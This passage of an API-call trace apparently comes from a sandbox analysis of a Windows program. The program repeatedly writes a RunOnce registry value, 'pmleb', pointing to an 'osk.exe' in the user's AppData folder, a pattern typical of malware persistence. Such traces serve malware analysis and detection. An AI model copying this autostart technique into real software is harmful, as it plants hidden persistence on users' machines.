1 [0103.886] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.886] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.886] KillTimer (hWnd=0x20280, uIDEvent=0x23e1) returned 1 [0103.886] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.887] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.887] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.887] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.887] RegCloseKey (hKey=0x280) returned 0x0 [0103.887] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.887] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.887] SetTimer (hWnd=0x20280, nIDEvent=0x23e2, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e2 [0103.888] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.901] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.901] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.902] KillTimer (hWnd=0x20280, uIDEvent=0x23e2) returned 1 [0103.902] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.902] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.902] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.903] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.903] RegCloseKey (hKey=0x280) returned 0x0 [0103.903] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.903] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.903] SetTimer (hWnd=0x20280, nIDEvent=0x23e3, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e3 [0103.903] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.917] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.917] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.917] KillTimer (hWnd=0x20280, uIDEvent=0x23e3) returned 1 [0103.918] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.918] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.918] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.918] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.919] RegCloseKey (hKey=0x280) returned 0x0 [0103.919] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.919] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.919] SetTimer (hWnd=0x20280, nIDEvent=0x23e4, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e4 [0103.919] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.952] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.952] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.952] KillTimer (hWnd=0x20280, uIDEvent=0x23e4) returned 1 [0103.952] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.953] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.953] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.953] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.953] RegCloseKey (hKey=0x280) returned 0x0 [0103.953] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.953] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.953] SetTimer (hWnd=0x20280, nIDEvent=0x23e5, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e5 [0103.953] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.965] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.965] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.965] KillTimer (hWnd=0x20280, uIDEvent=0x23e5) returned 1 [0103.965] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.966] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.966] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.966] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.966] RegCloseKey (hKey=0x280) returned 0x0 [0103.966] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.966] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.966] SetTimer (hWnd=0x20280, nIDEvent=0x23e6, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e6 [0103.966] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.979] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.979] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.980] KillTimer (hWnd=0x20280, uIDEvent=0x23e6) returned 1 [0103.980] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.981] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.981] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.981] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.981] RegCloseKey (hKey=0x280) returned 0x0 [0103.981] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.981] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.981] SetTimer (hWnd=0x20280, nIDEvent=0x23e7, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e7 [0103.982] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.995] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.995] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.995] KillTimer (hWnd=0x20280, uIDEvent=0x23e7) returned 1 [0103.996] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.996] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.996] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.996] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.996] RegCloseKey (hKey=0x280) returned 0x0 [0103.997] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.997] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.997] SetTimer (hWnd=0x20280, nIDEvent=0x23e8, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e8 [0103.997] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.011] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.011] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.011] KillTimer (hWnd=0x20280, uIDEvent=0x23e8) returned 1 [0104.011] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.012] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.012] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.012] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.012] RegCloseKey (hKey=0x280) returned 0x0 [0104.012] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.012] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.012] SetTimer (hWnd=0x20280, nIDEvent=0x23e9, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e9 [0104.012] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.027] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.027] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.027] KillTimer (hWnd=0x20280, uIDEvent=0x23e9) returned 1 [0104.028] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.028] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.028] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.028] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.029] RegCloseKey (hKey=0x280) returned 0x0 [0104.029] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.029] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.029] SetTimer (hWnd=0x20280, nIDEvent=0x23ea, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ea [0104.029] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.042] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.042] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.042] KillTimer (hWnd=0x20280, uIDEvent=0x23ea) returned 1 [0104.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.043] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.043] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.043] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.043] RegCloseKey (hKey=0x280) returned 0x0 [0104.043] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.044] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.044] SetTimer (hWnd=0x20280, nIDEvent=0x23eb, uElapse=0xa, lpTimerFunc=0x0) returned 0x23eb [0104.044] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.058] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.058] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.058] KillTimer (hWnd=0x20280, uIDEvent=0x23eb) returned 1 [0104.059] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.059] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.059] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.059] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.059] RegCloseKey (hKey=0x280) returned 0x0 [0104.060] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.060] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.060] SetTimer (hWnd=0x20280, nIDEvent=0x23ec, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ec [0104.060] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.073] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.073] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.073] KillTimer (hWnd=0x20280, uIDEvent=0x23ec) returned 1 [0104.074] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.074] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.074] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.074] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.074] RegCloseKey (hKey=0x280) returned 0x0 [0104.074] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.075] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.075] SetTimer (hWnd=0x20280, nIDEvent=0x23ed, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ed [0104.075] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.089] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.089] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.089] KillTimer (hWnd=0x20280, uIDEvent=0x23ed) returned 1 [0104.089] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.090] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.090] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.090] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.090] RegCloseKey (hKey=0x280) returned 0x0 [0104.090] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.090] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.090] SetTimer (hWnd=0x20280, nIDEvent=0x23ee, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ee [0104.090] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.104] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.104] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.105] KillTimer (hWnd=0x20280, uIDEvent=0x23ee) returned 1 [0104.105] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.105] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.105] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.105] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.106] RegCloseKey (hKey=0x280) returned 0x0 [0104.106] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.106] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.106] SetTimer (hWnd=0x20280, nIDEvent=0x23ef, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ef [0104.106] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.120] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.120] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.120] KillTimer (hWnd=0x20280, uIDEvent=0x23ef) returned 1 [0104.120] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.121] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.121] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.121] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.121] RegCloseKey (hKey=0x280) returned 0x0 [0104.121] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.121] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.121] SetTimer (hWnd=0x20280, nIDEvent=0x23f0, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f0 [0104.122] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.135] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.135] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.136] KillTimer (hWnd=0x20280, uIDEvent=0x23f0) returned 1 [0104.136] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.136] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.136] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.137] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.137] RegCloseKey (hKey=0x280) returned 0x0 [0104.137] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.137] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.137] SetTimer (hWnd=0x20280, nIDEvent=0x23f1, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f1 [0104.137] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.151] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.151] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.151] KillTimer (hWnd=0x20280, uIDEvent=0x23f1) returned 1 [0104.152] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.152] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.152] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.152] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.152] RegCloseKey (hKey=0x280) returned 0x0 [0104.152] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.153] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.153] SetTimer (hWnd=0x20280, nIDEvent=0x23f2, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f2 [0104.153] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.167] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.167] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.167] KillTimer (hWnd=0x20280, uIDEvent=0x23f2) returned 1 [0104.167] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.167] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.168] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.168] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.168] RegCloseKey (hKey=0x280) returned 0x0 [0104.168] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.168] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.168] SetTimer (hWnd=0x20280, nIDEvent=0x23f3, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f3 [0104.168] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.182] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.182] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.182] KillTimer (hWnd=0x20280, uIDEvent=0x23f3) returned 1 [0104.183] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.183] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.183] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.183] RegSetValueExA 